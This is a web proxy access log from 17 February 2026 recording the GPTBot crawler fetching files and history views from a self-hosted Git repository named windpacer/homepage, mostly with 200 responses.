"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/status.json" +[17/Feb/2026:13:03:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/status.json" +[17/Feb/2026:13:03:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/tsconfig.json" +[17/Feb/2026:13:03:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" [Client 74.7.227.38] [Length 50253] [Gzip 13.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" +[17/Feb/2026:13:03:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/package.json" +[17/Feb/2026:13:03:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" [Client 74.7.227.38] [Length 47165] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" +[17/Feb/2026:13:03:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html" [Client 74.7.227.38] [Length 30964] [Gzip 9.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" +[17/Feb/2026:13:03:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html" [Client 74.7.227.38] [Length 32587] [Gzip 9.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" +[17/Feb/2026:13:03:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html" [Client 74.7.227.38] [Length 30914] [Gzip 9.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" +[17/Feb/2026:13:03:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 10846] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" +[17/Feb/2026:13:03:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js" [Client 74.7.227.38] [Length 15697] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js" +[17/Feb/2026:13:03:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/script.js" [Client 74.7.227.38] [Length 16513] [Gzip 7.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/script.js" +[17/Feb/2026:13:03:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" [Client 74.7.227.38] [Length 38014] [Gzip 9.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:13:03:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/script.js" [Client 74.7.227.38] [Length 16456] [Gzip 7.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/script.js" +[17/Feb/2026:13:03:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" [Client 74.7.227.38] [Length 41653] [Gzip 13.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" +[17/Feb/2026:13:03:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html" [Client 74.7.227.38] [Length 41194] [Gzip 13.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" +[17/Feb/2026:13:03:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html" [Client 74.7.227.38] [Length 49951] [Gzip 13.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" +[17/Feb/2026:13:03:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html" [Client 74.7.227.38] [Length 10292] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html" +[17/Feb/2026:13:03:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html" [Client 74.7.227.38] [Length 10496] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html" +[17/Feb/2026:13:03:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html" [Client 74.7.227.38] [Length 10067] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html" +[17/Feb/2026:13:03:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png" +[17/Feb/2026:13:03:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html" [Client 74.7.227.38] [Length 41620] [Gzip 13.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html" +[17/Feb/2026:13:03:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html" [Client 74.7.227.38] [Length 43840] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html" +[17/Feb/2026:13:03:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" [Client 74.7.227.38] [Length 11147] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" +[17/Feb/2026:13:03:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" [Client 74.7.227.38] [Length 65420] [Gzip 13.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" +[17/Feb/2026:13:03:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" [Client 74.7.227.38] [Length 10321] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" +[17/Feb/2026:13:03:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" [Client 74.7.227.38] [Length 43840] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" +[17/Feb/2026:13:03:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" [Client 74.7.227.38] [Length 31006] [Gzip 9.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" +[17/Feb/2026:13:03:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html" [Client 74.7.227.38] [Length 47148] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html" +[17/Feb/2026:13:03:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html" [Client 74.7.227.38] [Length 43631] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html" +[17/Feb/2026:13:03:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js" [Client 74.7.227.38] [Length 4798] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js" +[17/Feb/2026:13:03:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 1657474] [Gzip 11.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png" +[17/Feb/2026:13:03:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 10123] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png" +[17/Feb/2026:13:03:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" [Client 74.7.227.38] [Length 56835] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" +[17/Feb/2026:13:03:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" [Client 74.7.227.38] [Length 34901] [Gzip 9.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" +[17/Feb/2026:13:03:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" [Client 74.7.227.38] [Length 56184] [Gzip 13.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" +[17/Feb/2026:13:03:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js" [Client 74.7.227.38] [Length 17281] [Gzip 8.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js" +[17/Feb/2026:13:03:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js/script.js" [Client 74.7.227.38] [Length 4668] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" +[17/Feb/2026:13:03:32 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" +[17/Feb/2026:13:03:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal" [Client 74.7.227.38] [Length 10732] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm" +[17/Feb/2026:13:03:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js/script.js" [Client 74.7.227.38] [Length 1659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html" +[17/Feb/2026:13:03:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 10822] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images" +[17/Feb/2026:13:03:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js/script.js" [Client 74.7.227.38] [Length 17062] [Gzip 8.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/script.js" +[17/Feb/2026:13:03:34 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" +[17/Feb/2026:13:03:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 10828] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png" +[17/Feb/2026:13:03:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" [Client 74.7.227.38] [Length 10952] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" +[17/Feb/2026:13:03:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" [Client 74.7.227.38] [Length 50664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" +[17/Feb/2026:13:03:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js/script.js" [Client 74.7.227.38] [Length 12443] [Gzip 5.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js" +[17/Feb/2026:13:03:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" [Client 74.7.227.38] [Length 14333] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:13:03:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images" [Client 74.7.227.38] [Length 10163] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets" +[17/Feb/2026:13:03:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt" [Client 74.7.227.38] [Length 9862] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal" +[17/Feb/2026:13:03:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal" [Client 74.7.227.38] [Length 9928] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal" +[17/Feb/2026:13:03:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 10103] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/dcsintegration.png" +[17/Feb/2026:13:03:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets" [Client 74.7.227.38] [Length 10883] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js/script.js" +[17/Feb/2026:13:03:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js" [Client 74.7.227.38] [Length 9989] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js/script.js" +[17/Feb/2026:13:03:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js/script.js" [Client 74.7.227.38] [Length 15614] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js/script.js" +[17/Feb/2026:13:03:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 